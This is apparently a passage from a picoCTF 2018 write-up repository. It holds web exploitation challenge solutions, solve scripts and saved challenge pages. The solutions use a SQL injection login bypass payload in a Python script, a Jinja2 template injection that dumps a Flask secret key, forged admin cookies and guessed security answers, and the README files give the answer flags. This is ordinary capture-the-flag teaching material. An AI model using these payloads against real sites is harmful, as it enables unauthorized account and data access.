    "content": "<!doctype html>\n<html>\n<head>\n    <title>Buttons!</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-md-12\">\n            <div class=\"panel panel-primary\" style=\"margin-top:50px\">\n                <div class=\"panel-heading\">\n                    <h3 class=\"panel-title\">Button2: ACCESS DENIED</h3>\n                </div>\n                <div class=\"panel-body\">\n                    <form action=\"button2.php\" method=\"POST\">\n                        FORM DISABLED. THIS INCIDENT HAS BEEN LOGGED AND REPORTED TO /dev/null                  \n                    </form>\n                </div>\n                <video controls autoplay style=\"width:100%\" src=\"video.mp4\" type=\"video/mp4\" />\n            </div>\n        </div>\n    </div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Buttons/solution/source/button1.php",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Buttons!</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div>\n    You did it! Try the next button: <a href=\"button2.php\">Button2</a>\n</div>\n</body>\n</html>"
  },
  {
    "path": "Web Exploitation/Buttons/solution/source/index.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Buttons!</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-md-12\">\n            <div class=\"panel panel-primary\" style=\"margin-top:50px\">\n                <div class=\"panel-heading\">\n                    <h3 class=\"panel-title\">BUTTON1</h3>\n                </div>\n                <div class=\"panel-body\">\n                    <form action=\"button1.php\" method=\"POST\">\n                        <input type=\"submit\" value=\"PUSH ME! I am your only hope!\"/>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Client Side is Still Bad/README.md",
    "content": "# Client Side is Still Bad\nPoints: 150\n\n## Category\nWeb Exploitation\n\n## Question\n>I forgot my password again, but this time there doesn't seem to be a reset, can you help me? ([link](http://2018shell1.picoctf.com:55790/))\n\n### Hint\n>Client Side really is a bad way to do it.\n\n## Solution\nInspect element and piece the flag together\n\n```js\nfunction verify() {\n\tcheckpass = document.getElementById(\"pass\").value;\n\tsplit = 4;\n\tif (checkpass.substring(split * 7, split * 8) == '}') {\n\t\tif (checkpass.substring(split * 6, split * 7) == 'd366') {\n\t\t\tif (checkpass.substring(split * 5, split * 6) == 'd_3b') {\n\t\t\t\tif (checkpass.substring(split * 4, split * 5) == 's_ba') {\n\t\t\t\t\tif (checkpass.substring(split * 3, split * 4) == 'nt_i') {\n\t\t\t\t\t\tif (checkpass.substring(split * 2, split * 3) == 'clie') {\n\t\t\t\t\t\t\tif (checkpass.substring(split, split * 2) == 'CTF{') {\n\t\t\t\t\t\t\t\tif (checkpass.substring(0, split) == 'pico') {\n\t\t\t\t\t\t\t\t\talert(\"You got the flag!\")\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} else {\n\t\talert(\"Incorrect password\");\n\t}\n}\n ```\n\n### Flag\n`picoCTF{client_is_bad_3bd366}`\n"
  },
  {
    "path": "Web Exploitation/Client Side is Still Bad/solution/source/index.html",
    "content": "<html>\n<head>\n<title>Super Secure Log In</title>\n</head>\n<body bgcolor=\"#000000\">\n<!-- standard MD5 implementation -->\n<script type=\"text/javascript\" src=\"md5.js\"></script>\n\n<script type=\"text/javascript\">\n  function verify() {\n    checkpass = document.getElementById(\"pass\").value;\n    split = 4;\n    if (checkpass.substring(split*7, split*8) == '}') {\n      if (checkpass.substring(split*6, split*7) == 'd366') {\n        if (checkpass.substring(split*5, split*6) == 'd_3b') {\n         if (checkpass.substring(split*4, split*5) == 's_ba') {\n          if (checkpass.substring(split*3, split*4) == 'nt_i') {\n            if (checkpass.substring(split*2, split*3) == 'clie') {\n              if (checkpass.substring(split, split*2) == 'CTF{') {\n                if (checkpass.substring(0,split) == 'pico') {\n                  alert(\"You got the flag!\")\n                  }\n                }\n              }\n      \n            }\n          }\n        }\n      }\n    }\n    else {\n      alert(\"Incorrect password\");\n    }\n  }\n</script>\n<div style=\"position:relative; padding:5px;top:50px; left:38%; width:350px; height:140px; background-color:red\">\n<div style=\"text-align:center\">\n<p>Welcome to the Secure Login Server.</p>\n<p>Please enter your credentials to proceed</p>\n<form action=\"index.html\" method=\"post\">\n<input type=\"password\" id=\"pass\" size=\"8\" />\n<br/>\n<input type=\"submit\" value=\"Log in\" onclick=\"verify(); return false;\" />\n</form>\n</div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Flaskcards/README.md",
    "content": "# Flaskcards\nPoints: 350\n\n## Category\nWeb Exploitation\n\n## Question\n>We found this fishy [website](http://2018shell1.picoctf.com:23547/) for flashcards that we think may be sending secrets. Could you take a look? \n\n### Hint\n>Are there any common vulnerabilities with the backend of the website?\n>\n>Is there anywhere that filtering doesn't get applied?\n>\n>The database gets reverted every 2 hours so your session might end unexpectedly. Just make another user\n\n## Solution\nJudging by the name of the challenge, we can assume that the web application was written using the _Flask_ framework. We can assume that it is running the _Jinja2_ template engine.\n\nUpon registering and signing in, we get multiple options. Some which includes Creating and Listing cards.\n\nWe can do a sample injection by doing _{{1+1}}_. Both the _Question_ and the _Answer_ fields are vulnerable, so it doesn't matter where it's placed in.\n\nWe see that when we list the cards, it shows _2_ and not _{{1+1}}_. 
This means there's an injection.\n\nSince there's no source code anywhere to be found, we can just look around, printing out important information used by flask.\n\nBy submitting _{{config.items()}}_, we get a bunch of information about the server, as well as the _'SECRET_KEY'_, which contains the flag.\n\n```python\ndict_items([('DEBUG', False), ('PREFERRED_URL_SCHEME', 'http'), ('SQLALCHEMY_POOL_TIMEOUT', None), ('JSON_AS_ASCII', True),\n('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('SQLALCHEMY_POOL_RECYCLE', None), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)),\n('JSON_SORT_KEYS', True), ('SQLALCHEMY_TRACK_MODIFICATIONS', False), ('SERVER_NAME', None), ('TRAP_BAD_REQUEST_ERRORS', None),\n('MAX_COOKIE_SIZE', 4093), ('USE_X_SENDFILE', False), ('EXPLAIN_TEMPLATE_LOADING', False), ('BOOTSTRAP_LOCAL_SUBDOMAIN', None),\n('APPLICATION_ROOT', '/'), ('BOOTSTRAP_USE_MINIFIED', True), ('MAX_CONTENT_LENGTH', None), ('BOOTSTRAP_QUERYSTRING_REVVING', True),\n('TRAP_HTTP_EXCEPTIONS', False), ('SESSION_COOKIE_PATH', None), ('TESTING', False), ('SQLALCHEMY_COMMIT_ON_TEARDOWN', False),\n('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SQLALCHEMY_POOL_SIZE', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_NAME', 'session'),\n('SESSION_COOKIE_SECURE', False), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TEMPLATES_AUTO_RELOAD', None), ('SESSION_COOKIE_SAMESITE', None),\n('JSONIFY_MIMETYPE', 'application/json'), ('SQLALCHEMY_RECORD_QUERIES', None), ('SESSION_COOKIE_DOMAIN', False), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)),\n('SQLALCHEMY_NATIVE_UNICODE', None), ('SQLALCHEMY_BINDS', None), ('SQLALCHEMY_DATABASE_URI', 'sqlite://'), ('SQLALCHEMY_ECHO', False),\n('BOOTSTRAP_SERVE_LOCAL', False), ('BOOTSTRAP_CDN_FORCE_SSL', False),\n('SECRET_KEY', 'picoCTF{secret_keys_to_the_kingdom_584f8327}'),\n('SESSION_REFRESH_EACH_REQUEST', True), ('SQLALCHEMY_MAX_OVERFLOW', None)])\n```\n\nI still have no idea what the admin page does.\n\n### 
Flag\n`picoCTF{secret_keys_to_the_kingdom_584f8327}`\n"
  },
  {
    "path": "Web Exploitation/Flaskcards Skeleton Key/README.md",
    "content": "# Flaskcards Skeleton Key\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin? http://2018shell1.picoctf.com:48263 ([link](http://2018shell1.picoctf.com:48263/)). \n\n### Hint\n>What can you do with a flask Secret_Key?\n>\n>The database still reverts every 2 hours\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Web Exploitation/Help Me Reset 2/README.md",
    "content": "# Help Me Reset 2\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:19054 (link). We need to get into any user for a flag!\n\n### Hint\n>Try looking past the typical vulnerabilities. Think about possible programming mistakes.\n\n## Solution\ngoing to the site, upon inspection, we notice a comment stating\n```\n<!--Proudly maintained by lum-->\n```\nassuming that the user has an account, we can then attempt to rest the password. we will be asked a few questions, to find the answer, i just did a simple google search for the popular answers\n\n```\nWhat is your favourite car make\nWhat is your favourite food?\nWhat is your favourite color?         white\nWhat is your favourite superhero?     thor\n```\n\nusing that, we can gain access and change the password and proceed to login\n\n### Flag\n`picoCTF{i_thought_i_could_remember_those_cb4afc2a}`\n"
  },
  {
    "path": "Web Exploitation/Inspect Me/README.md",
    "content": "# Inspect Me\nPoints: 125\n\n## Category\nWeb Exploitation\n\n## Question\n>Inpect this code! http://2018shell1.picoctf.com:53213 ([link](http://2018shell1.picoctf.com:53213/)) \n\n### Hint\n>How do you inspect a website's code on a browser?\n>\n>Check all the website code.\n\n## Solution\nDo `wget -r http://2018shell1.picoctf.com:53213` to pull the html, css and js sources.\n\nGo into each individual source and locate the 3 pieces of the flag.\n\n### Flag\n`picoCTF{ur_4_real_1nspect0r_g4dget_402b0bd3}`\n"
  },
  {
    "path": "Web Exploitation/Inspect Me/solution/source/index.html",
    "content": "<!doctype html>\n<html>\n  <head>\n    <title>My First Website :)</title>\n    <link href=\"https://fonts.googleapis.com/css?family=Open+Sans|Roboto\" rel=\"stylesheet\">\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"mycss.css\">\n    <script type=\"application/javascript\" src=\"myjs.js\"></script>\n  </head>\n\n  <body>\n    <div class=\"container\">\n      <header>\n\t<h1>My First Website</h1>\n      </header>\n\n      <button class=\"tablink\" onclick=\"openTab('tabintro', this, '#222')\" id=\"defaultOpen\">Intro</button>\n      <button class=\"tablink\" onclick=\"openTab('tababout', this, '#222')\">About</button>\n      \n      <div id=\"tabintro\" class=\"tabcontent\">\n\t<h3>Intro</h3>\n\t<p>This is my first website!</p>\n      </div>\n\n      <div id=\"tababout\" class=\"tabcontent\">\n\t<h3>About</h3>\n\t<p>These are the web skills I've been practicing: <br/>\n\t  HTML <br/>\n\t  CSS <br/>\n\t  JS (JavaScript)\n\t</p>\n\t<!-- I learned HTML! Here's part 1/3 of the flag: picoCTF{ur_4_real_1nspe -->\n      </div>\n      \n    </div>\n    \n  </body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Inspect Me/solution/source/mycss.css",
    "content": "div.container {\n    width: 100%;\n}\n\nheader {\n    background-color: #c9d8ef;\n    padding: 1em;\n    color: white;\n    clear: left;\n    text-align: center;\n}\n\nbody {\n    font-family: Roboto;\n}\n\nh1 {\n    color: #222;\n}\n\np {\n    font-family: \"Open Sans\";\n}\n\n.tablink {\n    background-color: #555;\n    color: white;\n    float: left;\n    border: none;\n    outline: none;\n    cursor: pointer;\n    padding: 14px 16px;\n    font-size: 17px;\n    width: 50%;\n}\n\n.tablink:hover {\n    background-color: #777;\n}\n\n.tabcontent {\n    color: #111;\n    display: none;\n    padding: 50px;\n    text-align: center;\n}\n\n#tabintro { background-color: #ccc; }\n#tababout { background-color: #ccc; }\n\n/* I learned CSS! Here's part 2/3 of the flag: ct0r_g4dget_402b0bd3} */"
  },
  {
    "path": "Web Exploitation/Inspect Me/solution/source/myjs.js",
    "content": "function openTab(tabName,elmnt,color) {\n    var i, tabcontent, tablinks;\n    tabcontent = document.getElementsByClassName(\"tabcontent\");\n    for (i = 0; i < tabcontent.length; i++) {\n\ttabcontent[i].style.display = \"none\";\n    }\n    tablinks = document.getElementsByClassName(\"tablink\");\n    for (i = 0; i < tablinks.length; i++) {\n\ttablinks[i].style.backgroundColor = \"\";\n    }\n    document.getElementById(tabName).style.display = \"block\";\n    if(elmnt.style != null) {\n\telmnt.style.backgroundColor = color;\n    }\n}\n\nwindow.onload = function() {\n    openTab('tabintro', this, '#222');\n}\n\n/* I learned JavaScript! Here's part 3/3 of the flag:  */\n"
  },
  {
    "path": "Web Exploitation/Irish Name Repo/README.md",
    "content": "# Irish Name Repo\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:59464 ([link](http://2018shell1.picoctf.com:59464/)) . Do you think you can log us in? Try to see if you can login!\n\n### Hint\n>There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?\n\n## Solution\nlooking at the support section of the site, it can be seen that the site uses SQL to store data,this could mean that it is vulnerable to SQL injections\n\n```\nCannot add name\nHi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error\nThat's because Conan O'Brien is American.\nAdmin\n```\n\ngoing to the login section of the site, it is seen that it accepts a username and password\n\n```\nLog In\n\nUsername: \nPassword:\n```\n\nUsing the username `' OR '1'='1' --`, we get the flag.\n\n```\nLogged in!\nYour flag is: picoCTF{con4n_r3411y_1snt_1r1sh_d121ca0b}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{con4n_r3411y_1snt_1r1sh_d121ca0b}`\n"
  },
  {
    "path": "Web Exploitation/Irish Name Repo/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {'username': \"' OR '1'='1' --\", 'password': '', 'debug': 0}\n\nr = requests.post('http://2018shell1.picoctf.com:59464/login.php', data=params)\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/Irish Name Repo/solution/source/index.html",
    "content": "<!DOCTYPE html>\n<html><head>\n<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\"><title>W3.CSS Template</title>\n<meta charset=\"UTF-8\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<link rel=\"stylesheet\" href=\"W3.CSS%20Template_files/w3.css\">\n<link rel=\"stylesheet\" href=\"W3.CSS%20Template_files/css.css\">\n<style>\nbody,h1,h2,h3,h4,h5,h6 {font-family: \"Karma\", sans-serif}\n.w3-bar-block .w3-bar-item {padding:20px}\n</style>\n</head><body>\n\n<!-- Top menu -->\n<div class=\"w3-top\">\n  <div class=\"w3-white w3-xlarge\" style=\"max-width:1200px;margin:auto\">\n    <div class=\"w3-button w3-padding-16 w3-left\" onclick=\"w3_open()\" >☰</div>\n    <div class=\"w3-center w3-padding-16\">List 'o the Irish!</div>\n  </div>\n</div>\n\n<!-- Sidebar (hidden by default) -->\n<nav class=\"w3-sidebar w3-bar-block w3-card w3-top w3-xlarge w3-animate-left\" style=\"display:none;z-index:2;width:40%;min-width:300px\" id=\"mySidebar\">\n  <a href=\"javascript:void(0)\" onclick=\"w3_close()\" class=\"w3-bar-item w3-button\">Close Menu</a>\n  <a href=\"support.html\" class=\"w3-bar-item w3-button\">Support</a>\n  <a href=\"login.html\" class=\"w3-bar-item w3-button\">Admin Login</a>\n</nav>\n\n<!-- !PAGE CONTENT! 
-->\n<div class=\"w3-main w3-content w3-padding\" style=\"max-width:1200px;margin-top:100px\">\n\n  <!-- First Photo Grid-->\n  <div class=\"w3-row-padding w3-padding-16 w3-center\">\n    <div class=\"w3-third\">\n      <img src=\"irish/Aidan_Gillen.jpg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Aidan Gillen</h3>\n      <p>I was on Game of Thrones!</p>\n    </div>\n    <div class=\"w3-third\">\n      <img src=\"irish/Aidan_Higgins_pic2.jpg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Aiden Higgens</h3>\n      <p>\"All fiction happened\"</p>\n    </div>\n    <div class=\"w3-third\">\n      <img src=\"irish/Alison_Doody.jpg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Alison Doody</h3>\n      <p>hehe...Doody.</p>\n    </div>\n  </div>\n  \n  <div class=\"w3-row-padding w3-padding-16 w3-center\">\n    <div class=\"w3-third\">\n      <img src=\"irish/Dylan_Moran_Melbourne.jpg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Dylan Moran</h3>\n      <p>\"You can sort your life out anytime; the pub closes in five hours.\"</p>\n    </div>\n    <div class=\"w3-third\">\n      <img src=\"irish/TommyT.jpeg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Tommy Tiernan</h3>\n      <p>Editor's note: could not find quote without profanity.</p>\n    </div>\n    <div class=\"w3-third\">\n      <img src=\"irish/Brendan_Gleeson.jpg\" alt=\"Image not available\" style=\"width:100%\">\n      <h3>Brendan Gleeson</h3>\n      <p>Guess which Harry Potter character I was!</p>\n    </div>\n  </div>\n  \n\n  <!-- Pagination -->\n  <div class=\"w3-center w3-padding-32\">\n    <div class=\"w3-bar\">\n      <a href=\"#\" class=\"w3-bar-item w3-button w3-hover-black\">«</a>\n      <a href=\"#\" class=\"w3-bar-item w3-black w3-button\">1</a>\n      <a href=\"#\" class=\"w3-bar-item w3-button w3-hover-black\">2</a>\n      <a href=\"#\" class=\"w3-bar-item w3-button w3-hover-black\">3</a>\n      <a href=\"#\" 
class=\"w3-bar-item w3-button w3-hover-black\">4</a>\n      <a href=\"#\" class=\"w3-bar-item w3-button w3-hover-black\">»</a>\n    </div>\n  </div>\n\n<!-- End page content -->\n</div>\n<script>\n  // Script to open and close sidebar\n  function w3_open() {\n      document.getElementById(\"mySidebar\").style.display = \"block\";\n  }\n   \n  function w3_close() {\n      document.getElementById(\"mySidebar\").style.display = \"none\";\n  }\n  </script>\n</body></html>\n"
  },
  {
    "path": "Web Exploitation/Irish Name Repo/solution/source/login.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Login</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-md-12\">\n            <div class=\"panel panel-primary\" style=\"margin-top:50px\">\n                <div class=\"panel-heading\">\n                    <h3 class=\"panel-title\">Log In</h3>\n                </div>\n                <div class=\"panel-body\">\n                    <form action=\"login.php\" method=\"POST\">\n                        <fieldset>\n                            <div class=\"form-group\">\n                                <label for=\"username\">Username:</label>\n                                <input type=\"text\" id=\"username\" name=\"username\" class=\"form-control\">\n                            </div>\n                            <div class=\"form-group\">\n                                <label for=\"password\">Password:</label>\n                                <div class=\"controls\">\n                                    <input type=\"password\" id=\"password\" name=\"password\" class=\"form-control\">\n                                </div>\n                            </div>\n                            <input type=\"hidden\" name=\"debug\" value=\"0\">\n\n                            <div class=\"form-actions\">\n                                <input type=\"submit\" value=\"Login\" class=\"btn btn-primary\">\n                            </div>\n                        </fieldset>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Irish Name Repo/solution/source/support.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Support</title>\n    <style>\n        body {\n            background-color: lightgray\n        }\n        .container {\n            margin: auto;\n            width: 50%;\n            background-color: blue;\n            padding: 10px;\n        }\n        .title {\n            margin-top: 0%\n        }\n        .post-body {\n            padding:10px;\n            margin:10px;\n            background-color: white\n        }\n        .post-title {\n            background-color: gray;\n            margin: auto;\n            padding: 10px;\n        }\n        .post-panel {\n            background-color: lightgray\n        }\n        .post-container {\n            background-color: gray;\n            padding: 30px;\n            margin-top: 20px;\n            margin-bottom: 20px\n        }\n        .post {\n            padding: 10px\n        }\n        .author {\n            color:mediumblue;\n            margin-left: 10px\n        }\n    </style>\n</head>\n<body>\n    <div class=\"title\">\n        <h1 class=\"page-title\">Support</h1>\n    </div>\n    <div class=\"post-panel\">\n        <h4 class=\"post-title\">Cannot add name</h4>\n        <div class=\"post\">\n            <div class=\"post-body\">Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error</div>    \n        </div>\n        <div class=\"post\">\n            <div class=\"post-body\">That's because Conan O'Brien is American.</div>\n            <div class=\"author\">Admin</div>\n        </div>\n    </div>\n    <div class=\"post-panel\">\n            <h4 class=\"post-title\">Why is this site so trash?</h4>\n            <div class=\"post\">\n                <div class=\"post-body\">Can you help me find my parents. 
I think they were Irish.</div>\n                <div class=\"author\">Anna</div>\n            </div>\n            <div class=\"post\">\n                <div class=\"post-body\">no</div>\n                <div class=\"author\">Admin</div>\n            </div>\n        </div>\n    </div>\n    <div class=\"post-panel\">\n        <h4 class=\"post-title\">Why is this site so trash?</h4>\n        <div class=\"post\">\n            <div class=\"post-body\">Yo. Why this site look so bad? LOL</div>\n            <div class=\"author\">JimmyMcTrollface</div>\n        </div>\n        <div class=\"post\">\n            <div class=\"post-body\">I AM JUST ONE MAN!!!!</div>\n            <div class=\"author\">Admin</div>\n        </div>\n    </div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/LambDash 3/README.md",
    "content": "# LambDash 3\nPoints: 800\n\n## Category\nWeb Exploitation\n\n## Question\n>C? Who uses that anymore. If we really want to be secure, we should all start learning lambda calculus. http://2018shell1.picoctf.com:52603 ([link](http://2018shell1.picoctf.com:52603/)) \n\n### Hint\n>This compiler is 99.9% bug free! I'm sure the other 0.1% won't amount to anything...\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Web Exploitation/Logon/README.md",
    "content": "# Logon\nPoints: 150\n\n## Category\nWeb Exploitation\n\n## Question\n>I made a website so now you can log on to! I don't seem to have the admin password. See if you can't get to the flag. ([link](http://2018shell1.picoctf.com:37861/)) \n\n### Hint\n>Hmm it doesn't seem to check anyone's password, except for admins?\n>\n>How does check the admin's password?\n\n## Solution\nUsing any password and username, you will be able to login, however, upon logon,you will be greeted by:\n\n```\nSuccess: You logged in! Not sure you'll be able to see the flag though.\nNo flag for you\n```\nUpon inspection of cookies, it can be seen that there exists a cookie names admin with theh value false\n```\nadmins\t\tFalse\t\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t10\npassword\tpassword\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t20\nusername\tusername\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t20\n```\n\nChanging the value of admin to True will result in the printing of the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{l0g1ns_ar3nt_r34l_a280e12c}`\n"
  },
  {
    "path": "Web Exploitation/Logon/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {'user': 'A', 'password': 'A', 'submit': 'Sign In'}\njar = {'admin': 'True', 'password': '', 'username': ''}\n\nr = requests.get('http://2018shell1.picoctf.com:37861/flag', data=params, cookies=jar)\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/Logon/solution/source/index.html",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"/\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/logout\" class=\"btn btn-link pull-right\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n        \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n      \n      <div class=\"jumbotron\">\n        <p class=\"lead\"></p>\n        <div class=\"login-form\">\n            <form role=\"form\" action=\"/login\" method=\"post\">\n                <div class=\"form-group\">\n                    <input type=\"text\" name=\"user\" id=\"email\" class=\"form-control input-lg\" placeholder=\"Username\">\n                </div>\n                <div class=\"form-group\">\n                    <input type=\"password\" name=\"password\" id=\"password\" class=\"form-control input-lg\" placeholder=\"Password\">\n                </div>\n            </div>\n            <div class=\"row\">\n                <div class=\"col-xs-12 col-sm-12 col-md-12\">\n                    <input type=\"submit\" class=\"btn btn-lg btn-success btn-block\" value=\"Sign In\">\n                
</div>\n            </div>\n        </form>\n    </div>\n    <footer class=\"footer\">\n        <p>&copy; PicoCTF 2018</p>\n    </footer>\n\n</div>\n\n<script>\n$(document).ready(function(){\n    $(\".close\").click(function(){\n        $(\"myAlert\").alert(\"close\");\n    });\n});\n</script>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Logon/solution/source/logout",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>My New Website</title>\n\n\n    <link href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css\" rel=\"stylesheet\">\n\n    <link href=\"https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css\" rel=\"stylesheet\">\n\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n\n\n</head>\n\n<body>\n\n    <div class=\"container\">\n        <div class=\"header\">\n            <nav>\n                <ul class=\"nav nav-pills pull-right\">\n                    <li role=\"presentation\" class=\"active\"><a href=\"/\">Home</a>\n                    </li>\n                    <li role=\"presentation\"><a href=\"/logout\" class=\"btn btn-link pull-right\">Sign Out</a>\n                    </li>\n                </ul>\n            </nav>\n            <h3 class=\"text-muted\">My New Website</h3>\n        </div>\n        \n        <!-- Categories: success (green), info (blue), warning (yellow), danger (red) -->\n        \n      \n      <div class=\"jumbotron\">\n        <p class=\"lead\"></p>\n        <div class=\"login-form\">\n            <form role=\"form\" action=\"/login\" method=\"post\">\n                <div class=\"form-group\">\n                    <input type=\"text\" name=\"user\" id=\"email\" class=\"form-control input-lg\" placeholder=\"Username\">\n                </div>\n                <div class=\"form-group\">\n                    <input type=\"password\" name=\"password\" id=\"password\" class=\"form-control input-lg\" placeholder=\"Password\">\n                </div>\n            </div>\n            <div class=\"row\">\n                <div class=\"col-xs-12 col-sm-12 col-md-12\">\n                    <input type=\"submit\" class=\"btn btn-lg btn-success btn-block\" value=\"Sign In\">\n                
</div>\n            </div>\n        </form>\n    </div>\n    <footer class=\"footer\">\n        <p>&copy; PicoCTF 2018</p>\n    </footer>\n\n</div>\n\n<script>\n$(document).ready(function(){\n    $(\".close\").click(function(){\n        $(\"myAlert\").alert(\"close\");\n    });\n});\n</script>\n</body>\n\n</html>"
  },
  {
    "path": "Web Exploitation/Mr. Robots/README.md",
    "content": "# Mr. Robots\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Do you see the same things I see? The glimpses of the flag hidden away? ([link](http://2018shell1.picoctf.com:10157/))\n\n### Hint\n>What part of the website could tell you where the creator doesn't want you to look?\n\n## Solution\ngoing to the site, we will be able to see \n\n#### index.html\n```\nMr. Robots\nHELLO FRIEND\n```\ngiven the hints above, we visit /robots.txt to see if there any sites that the creator does not want us to know about\n\n#### robots.txt\n\n```\nUser-agent: *\nDisallow: /143ce.html\n```\nnow we go to 143ce.html\n\n#### 143ce.html\n```\nMr. Robots\nSo much depends upon a red flag\npicoCTF{th3_w0rld_1s_4_danger0us_pl4c3_3lli0t_143ce}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{th3_w0rld_1s_4_danger0us_pl4c3_3lli0t_143ce}`\n"
  },
  {
    "path": "Web Exploitation/Mr. Robots/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nr = requests.get('http://2018shell1.picoctf.com:10157/robots.txt')\nsource = r.text\npage = re.findall(r'Disallow: /(.+)', source)[0]\nprint 'Found: ' + page\n\nr = requests.get('http://2018shell1.picoctf.com:10157/{}'.format(page))\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/Mr. Robots/solution/source/index.html",
    "content": "<!doctype html>\n<html>\n  <head>\n    <title>Mr. Robots</title>\n    <link href=\"https://fonts.googleapis.com/css?family=Monoton|Roboto\" rel=\"stylesheet\">\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\">\n  </head>\n\n  <body>\n    <div class=\"container\">\n      <header>\n\t<h1>Mr. Robots</h1>\n      </header>\n      <div class=\"content\">\n\t<p>HELLO FRIEND</p>\n      </div>\n      <footer></footer>\n    </div>\n  </body>\n</html>\n"
  },
  {
